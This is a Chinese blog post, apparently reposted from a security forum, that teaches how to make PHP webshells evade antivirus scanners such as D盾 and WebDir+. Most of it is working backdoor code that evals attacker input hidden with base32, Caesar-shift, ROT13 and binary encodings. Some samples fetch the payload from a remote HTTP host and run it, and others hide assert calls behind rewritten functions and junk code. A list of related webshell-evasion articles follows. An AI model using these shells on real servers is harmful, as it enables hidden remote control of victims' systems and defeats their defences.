干货!一些webshell免杀的技巧

最新推荐文章于 2023-08-19 12:05:02 发布
最新推荐文章于 2023-08-19 12:05:02 发布
阅读量497 收藏 5
点赞数 1
分类专栏: 信息安全 文章标签: 网络安全 信息安全 渗透测试
原文链接:https://xz.aliyun.com/t/9290
版权

公粽号:黒掌

一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主!

0x00:前言
由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束。

0x01:自定义加密Bypass
部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则 比如某dir+
img
比如这个 都能被检测出是shell

所以为了防止这种的规则 自定义加密显然是最优解

自定义加密可选性多了 只要能把加密后的字符还原回去就行 比如base32 base58 这类的base编码全家桶 或者自定义ascii移位 甚至是对称加密算法等都是可以绕过这类规则检测

  • base32编码payload

    https://github.com/pureqh/webshell):

    <?php
class KUYE{
      public $DAXW = null;
      public $LRXV = null;
      function __construct(){
      $this->DAXW = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
      $this->LRXV = @SYXJ($this->DAXW);
      @eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
      }}
new KUYE();
function MNWK($QSFX){
  $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
  $NLHB = '';
  $v = 0;
  $vbits = 0;
  for ($i = 0, $j = strlen($QSFX); $i < $j; $i++){
  $v <<= 8;
      $v += ord($QSFX[$i]);
      $vbits += 8;
      while ($vbits >= 5) {
          $vbits -= 5;
          $NLHB .= $BASE32_ALPHABET[$v >> $vbits];
          $v &= ((1 << $vbits) - 1);}}
  if ($vbits > 0){
      $v <<= (5 - $vbits);
      $NLHB .= $BASE32_ALPHABET[$v];}
  return $NLHB;}
function SYXJ($QSFX){
  $NLHB = '';
  $v = 0;
  $vbits = 0;
  for ($i = 0, $j = strlen($QSFX); $i < $j; $i++){
      $v <<= 5;
      if ($QSFX[$i] >= 'a' && $QSFX[$i] <= 'z'){
          $v += (ord($QSFX[$i]) - 97);
      } elseif ($QSFX[$i] >= '2' && $QSFX[$i] <= '7') {
          $v += (24 + $QSFX[$i]);
      } else {
          exit(1);
      }
      $vbits += 5;
      while ($vbits >= 8){
          $vbits -= 8;
          $NLHB .= chr($v >> $vbits);
          $v &= ((1 << $vbits) - 1);}}
  return $NLHB;}
?>

    img

  • ascii码移位payload(凯撒加密)

    <?php
class FKPC{
      function __construct(){
      $this->TQYV = "bs^i%!\MLPQXwbolZ&8";
      $this->WZDM = @HHGJ($this->TQYV);
      @eval("/*#jkskjwjqo*/".$this->WZDM."/*sj#ahajsj*/");
      }}
new FKPC();
function HHGJ($UyGv) {
$svfe = [];
$mxAS = '';
$f = $UyGv;
for ($i=0;$i<strlen($f);$i++)
{
  $svfe[] = chr((ord($f[$i])+3));
}
$mxAS = implode($svfe);
return $mxAS ;
}
?>

    img

    居然没过webdir+

那如何解决呢 我们后面再说 当然应付D盾还是绰绰有余了
img
Rot13加密payload

<?php

class KUYE{
        public $DAXW = null;
        public $LRXV = null;
        function __construct(){
        $this->DAXW = 'riny($_CBFG[mreb]);';
        $this->LRXV = @str_rot13($this->DAXW);
        @eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
        }}
new KUYE();

?>

二进制转化payload

<?php

class KUYE{
        public $DAXW = null;
        public $LRXV = null;
        function __construct(){
        $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 1001111 1010011 1010100 1011011 1111010 1100101 1110010 1101111 1011101 101001 111011';
        $this->LRXV = @BinToStr($this->DAXW);
        @eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
        }}
new KUYE();
function BinToStr($str){
    $arr = explode(' ', $str);
    foreach($arr as &$v){
        $v = pack("H".strlen(base_convert($v, 2, 16)), base_convert($v, 2, 16));
    }

    return join('', $arr);
}
?>

img
这里就不列举了 只要方法正确 绕过杀软是很简单的

0x02:通过http获得关键参数
上面那个凯撒密码不是被webdir+杀了吗 我们在这里将他绕过

众所周知凯撒密码需要设置往前或往后移几位ascii 这个参数可以设置为解密方法的输入参数 经过测试 此参数在源码中会被沙盒跑出了 因此不能过百度杀毒 ,那么 我不写本地不就行了 我直接起一个http服务访问文本获得参数值。

<?php
class FKPC{
        function __construct(){
        $url = "http://xxxxx:8080/1.txt";
        $fp = fopen($url, 'r');
        stream_get_meta_data($fp);
        while (!feof($fp)) {
            $body.= fgets($fp, 1024);
        }
        $this->x = $body;
        $this->TQYV = "bs^i%!\MLPQXwbolZ&8";
        $this->WZDM = @HHGJ($this->TQYV,$this->x);
        @eval("/*#jkskjwjqo*/".$this->WZDM."/*sj#ahajsj*/");
        }}
new FKPC();

function HHGJ($UyGv,$x) {
$svfe = [];
$mxAS = '';
$f = $UyGv;
for ($i=0;$i<strlen($f);$i++)
{
    $svfe[] = chr((ord($f[$i])+$x));
}
$mxAS = implode($svfe);
return $mxAS ;
}
?>

img
当然肯定能用
img
但是 这转了一圈简直不低碳啊 我不能直接http获取payload吗 …

简化代码:

<?php
class KUYE{
        public $a = 'yshasaui';
        public $b = '';
        function __construct(){
        $url = "http://xxx/1.txt";
        $fp = fopen($url, 'r');
        stream_get_meta_data($fp);
        while (!feof($fp)) {
            $body.= fgets($fp, 1024);
        }
        $this->b = $body;
        @eval("/*GnSpe=121u*/".$this->b."/*Gn212Spe=u*/");
        }}
new KUYE();
?>

img
img
0x03:重写函数Bypass
众所周知 正则类杀软最喜欢直接把危险函数加入规则 那么 它杀的是函数名 还是逻辑呢?

试一试就知道了

我们的样本如下:

<?php

$a = substr("assertxx",0,6);

$a($_POST['x']);

?>

这是个使用substr函数切割关键字的小马

直接扔到webdir+杀
img
毫无疑问的被杀了

那么 我们重写substr函数

function mysubstr($string, $start = 0, $length = null) {
    $result = '';
    $strLength = strlen($string);
    if ($length === null) {
        $length = $strLength;
    }
    $length = (int) $length;
    $start = $start < 0 ? ($strLength + $start) : ($start);
    $end = $length < 0 ? ($strLength + $length) : $start + $length;
    if ($start > $strLength || ($end - $start) === 0) {
        return $result;
    }
    for (; $start < $end; $start ++) {
        $result .= $string[$start];
    }
    return $result;
}

然后把函数替换

<?php
$b = 'assert(xyz@';
$c =  mysubstr($b,0,6);
$c($_POST['zero']);
function mysubstr($string, $start = 0, $length = null) {
    $result = '';
    $strLength = strlen($string);
    if ($length === null) {
        $length = $strLength;
    }
    $length = (int) $length;
    $start = $start < 0 ? ($strLength + $start) : ($start);
    $end = $length < 0 ? ($strLength + $length) : $start + $length;
    if ($start > $strLength || ($end - $start) === 0) {
        return $result;
    }
    for (; $start < $end; $start ++) {
        $result .= $string[$start];
    }
    return $result;
}
?>

再拿去杀
img
结论很清楚了

再来D盾杀一下
img
不错 报2级了 这就是沙盒型查杀和正则类查杀的明显区别 怎么过呢 用构造方法即可

<?php

class pure
{
  public $a = '';
  function __destruct(){

    assert("$this->a");
  }
}
$b = new pure;
$b->a = $_POST['zero'];
function mysubstr($string, $start = 0, $length = null) {
    $result = '';
    $strLength = strlen($string);
    if ($length === null) {
        $length = $strLength;
    }
    $length = (int) $length;
    $start = $start < 0 ? ($strLength + $start) : ($start);
    $end = $length < 0 ? ($strLength + $length) : $start + $length;
    if ($start > $strLength || ($end - $start) === 0) {
        return $result;
    }
    for (; $start < $end; $start ++) {
        $result .= $string[$start];
    }
    return $result;
}
?>

img
看到这里大家可能也很奇怪 这里都没用到mysubstr函数 放上去不是多此一举吗

不好意思 恰恰不是 我们可以去掉这个函数 用D盾杀一下

<?php

class pure
{
  public $a = '';
  function __destruct(){

    assert("$this->a");
  }
}
$b = new pure;
$b->a = $_POST['zero'];
?>

img
怎么样 是不是很有趣

这里放这堆代码并不是为了真的用它 而是为了过D盾的特征查杀 所以放什么函数是无所谓的。

比如这样:

<?php

class pure
{
  public $a = '';
  function __destruct(){

    assert("$this->a");
  }
}
$b = new pure;
$b->a = $_POST['zero'];
function mysubstr($a,$b) {
    echo "?sasasjajksjka";
    echo "?sasasjajksjka";
    echo "?sasasjajksjka";
    echo "?sasasjajksjka";
    echo "?sasasjajksjka";
    echo "?sasasjajksjka";
    echo "?sasasjajksjka";
    echo "?sasasjajksjka";
}
?>

img
这里只介绍了重写substr函数 那么其他的函数可以吗 当然可以
**0x04:写在后面

只要思想不滑坡 方法总比困难多

来源:https://xz.aliyun.com/t/9290

活码3D(缩小)

今天的分享就到这里,喜欢的小伙伴记得一键三连,我有一个公粽号【黒掌】, 可以免费获取更多黑客秘籍,欢迎来耍!

是叶十三
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
冰蝎WebShell免杀生成
Fly_鹏程万里
06-02 273
ByPassBehinder / 冰蝎WebShell免杀生成文件:ByPassBehinder.exe。
rasp java tomcat_webshell中的分离免杀实践
weixin_28719385的博客
02-27 371
声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。描述前段时间看了倾旋的分离免杀直播,感觉像打开了免杀新世界的大门,jsp 中使用...
SyntaxError: return outside function
逐梦人.的博客
10-10 1896
这种语法错误一般出现在return没有在函数内部写,而写在了函数外部或者没有定义函数的时候使用了,这种就会报错。
webshell免杀构造技巧
weixin_30374009的博客
07-10 214
前言 最近研究了一下webshell免杀,发现还是比较简单的。市面上大多的webshell查杀工具都是基于正则匹配,或者提取已有样本的特征来判断。想要免杀只需要判断出查杀工具的查杀规则,避开规则就可以做到免杀,这里以php为例,分享一些研究过程中发现的免杀构造技巧免杀技巧 1.特殊的执行方式 很久之前t00ls上有一篇文章说的是通过构造反序列化的对象,然后在反序列化的过程中魔术方法的...
java 在已有的so基础上封装jni_webshell中的分离免杀实践java篇
weixin_39708708的博客
11-28 196
声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。描述前段时间看了倾旋的分离免杀直播,感觉像打开了免杀新世界的大门,js...
PHP webshell免杀技术实践与探索.pdf
最新发布
01-05
首先,我们将介绍 Webshell 的概念和基本特征,然后讨论传统的 Webshell 免杀技术的缺陷,并提出基于语法逻辑、运算逻辑、生僻回调、静态特征隐藏等方法的免杀技术。最后,我们将总结出一套适用于当代 Webshell 免杀...
2016最新php免杀webshell过安全狗
03-05
这个文件可能是经过特殊处理的,比如包含了免杀技巧,使得它能够绕过安全狗的检测。 综上所述,这个压缩包提供的知识点主要集中在PHP免杀Webshell技术和如何绕过Web应用防火墙,尤其是针对2016年环境的安全策略。这...
Webshell免杀教程
02-03
以下是一些常见的 Webshell 免杀技巧: 1. **代码混淆**:改变关键函数的大小写,混合使用大小写字母,增加杀毒软件识别的难度。 2. **反写代码**:将容易被查杀的文件系统对象(如 FSO)的读写代码反写为字符串,...
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
【标题】"new.bypass_bypass_NEW_免杀_webshell_phpwebshell_" 指的是一种新型的Webshell,它带有“bypass”和“NEW”特性,表明这是一个旨在绕过安全检测,且是最新技术的PHP WebshellWebshell通常被黑客用于远程...
源码免杀webshell
05-04
【源码免杀Webshell】是一种特殊的Web应用程序代码,它被设计用来绕过安全系统,允许未经授权的远程访问和控制服务器。在网络安全领域,Webshell是黑客常用的工具,用于在目标服务器上执行命令、上传/下载文件以及...
php shell超强免杀、减少体积工具实现代码
12-19
lostwolf写的 这不是webshell,只是个webshell免杀工具 切勿当初webshell使用 仅限免杀phpwebshell 该工具运行在 cli 模式! 如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马! 任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙 复制代码 代码如下: <?php /* Title: PHP shell nokill T00L Blog: exploit-db.blogcn.com */ error_reporting(0); @ini_set(‘memory_limit’,’-1′); set_time_limit
aspxwebshell免杀过杀软亲自制作
10-29
亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy f.jpg/b +x.aspx/a hez.jpg
php webshell 免杀入门
Goodric的博客
08-09 1361
免杀则是通过灵活运用编程语言的不同特征以及提供的参数重构木马来躲避查杀工具的查杀。还有通过加解密技术对木马程序进行加解密处理。
webshell 常见 Bypass waf 技巧总结
hl1293348082的专栏
05-31 772
对于很多,和我一样刚刚入门,或者还在门边徘徊的小伙伴们,在渗透学习的过程中,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢,接下来就由我带各位小伙伴们一起踏上大马免杀之路,不喜勿喷。 一篇好的文章,内容可以差,目录一定要 ~~ 吹牛 ~~ 真实。 一. webshell 免杀 0x0 php 内置函数加密 小例子: 在制作免杀大马之前,我们先来看看,一个带后门的免杀 php 大马是如何制作的。 在后门网站webshell8下载..
PHP-Webshell免杀研究
weixin_44110913的博客
08-23 743
不想当将军的士兵不是好士兵,不想getshell的Hacker不是好Hacker~ 有时候我们在做攻防对抗时经常会碰到可以上传webshell的地方,但是经常会被安全狗、D盾、护卫神、云锁等安全软件查杀,在本篇文章中将会介绍一些常用的木马免杀技巧,主要针对安全狗、护卫神、D盾进行免杀~ 查杀软件 D盾 D盾是一个专门为IIS设计的主动防御的安全性保护软件,它采用以内外防护的方式防止服务器和网站被人入侵,它秉持在正常运行各类网站的情况下,越少的功能,服务器就越安全的理念而设。它具有一句话木马查杀、主动后门拦.
查杀webshell木马
shatianyzg的博客
05-23 342
查杀webshell木马
认识JSP webshell免杀
xlsj雪松的博客
08-19 1022
Tomcat运行这就是一个典型的webshell,但这个webshell的各种特征已经被安全检测平台记录,很容易识别出来。【D盾】【shellpub】接下来进行免杀免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
Webshell免杀-JSP
qq_55787787的博客
10-15 2844
JSP免杀马的基本免杀方式
webshell免杀
03-16
WebShell 免杀指的是让 WebShell 在网站管理员或安全软件扫描时不被检测到或误判为恶意软件。这可以通过混淆、加密或隐藏 WebShell 的代码来实现。但是需要注意的是,这并不能保证 WebShell 不会被发现或清除,并且...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值